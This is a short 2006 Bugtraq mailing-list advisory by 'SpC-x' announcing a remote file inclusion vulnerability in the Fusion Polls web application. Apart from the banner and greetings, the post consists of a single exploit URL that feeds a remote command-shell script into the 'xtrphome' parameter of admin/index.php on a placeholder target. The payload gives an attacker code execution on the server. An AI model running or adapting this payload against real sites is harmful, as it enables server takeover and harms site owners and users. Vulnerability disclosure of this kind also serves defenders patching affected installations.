
Date: 14 Jun 2006 10:34:39 -0000
From: SpC-x@...mail.Org
To: bugtraq@...urityfocus.com
Subject: Fusion Polls (xtrphome) Remote File Inclusion


######################################################
# Fusion Polls (xtrphome) Remote File Inclusion
######################################################
# Credit : SpC-x
# Mail : SpC-x@...mail.Org
# Site : http://wWw.SaVSaK.CoM
######################################################
# Greetz :
# | The_BeKiR | Nukedx | Ejder | Str0ke | joffer | Poizonb0x |
######################################################

Remote File Inclusion :

http://www.target.com/path/admin/index.php?xtrphome=[Command-Shell]

/SpC-x


